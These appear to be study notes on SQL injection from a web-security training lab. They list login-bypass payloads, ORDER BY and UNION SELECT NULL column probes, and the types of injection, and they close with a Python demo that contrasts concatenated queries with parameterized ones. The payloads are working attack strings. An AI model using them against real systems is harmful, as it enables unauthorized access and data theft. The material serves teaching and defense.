PSG SQL
Basic SQL Login Auth bypass

Note: If inside Burp Repeater, remember to press CTRL + U to format (URL-encode) the payload.

' order by 1 --

will become

'+order+by+1+--

Vuln code

SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'

Crafting

SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'

Exploit Delivery

administrator' --
' OR 1=1 --

Type of SQL injections

- In-band SQLi: you get the response directly, a.k.a. normal SQLi
- Inferential SQLi: you don't get a response, a.k.a. blind SQLi
- Out-of-band SQLi: you use a server as a man in the middle to send the response back to you
UNION attack to retrieve data from other tables

Vuln code

select * from categoryTable where category='Corporate Gifts'

Determine number of columns

' order by 1 --
' order by 2 --

Combine order by with select query

select * from categoryTable where category='' order by 1 --anything here gets ignored

UNION SELECT can be used to double check the number of columns

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

Ensure same Data type

'a' , 'a'
123 , 'a123'

characters?
alphanumeric?
numbers?
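
Added example (not part of the original notes): the login query and the category query from above, each built once by string concatenation and once with bound parameters, run against an in-memory SQLite database with the payloads listed on this page. The table layout, the sample rows and the function names are assumptions made for the example.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column layout are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'constructed-admin-pw'),
                                 ('wiener', 'bluecheese');
        CREATE TABLE categoryTable (name TEXT, category TEXT);
        INSERT INTO categoryTable VALUES ('Mug', 'Corporate Gifts'),
                                         ('Lamp', 'Lighting');
    """)
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text: a quote in it closes the string
    # literal and whatever follows is parsed as SQL.
    sql = ("SELECT * FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return db.execute(sql).fetchall()

def login_safe(db, username, password):
    # Placeholders: the values are bound as data and never parsed as SQL.
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()

def category_vulnerable(db, category):
    sql = "select * from categoryTable where category='" + category + "'"
    return db.execute(sql).fetchall()

def category_safe(db, category):
    sql = "select * from categoryTable where category = ?"
    return db.execute(sql, (category,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for user in ("wiener", "administrator' --", "' OR 1=1 --"):
        print(repr(user), len(login_vulnerable(db, user, "wrong")),
              len(login_safe(db, user, "wrong")))
    for cat in ("Corporate Gifts", "' UNION SELECT NULL--",
                "' UNION SELECT NULL,NULL--"):
        try:
            rows = category_vulnerable(db, cat)
        except sqlite3.OperationalError as exc:
            rows = "SQL error: %s" % exc  # column-count mismatch reached the parser
        print(repr(cat), rows, category_safe(db, cat))
```

With the concatenated queries the payloads change the row count or surface a SQL error; with bound parameters every payload is compared as a literal string and returns no rows.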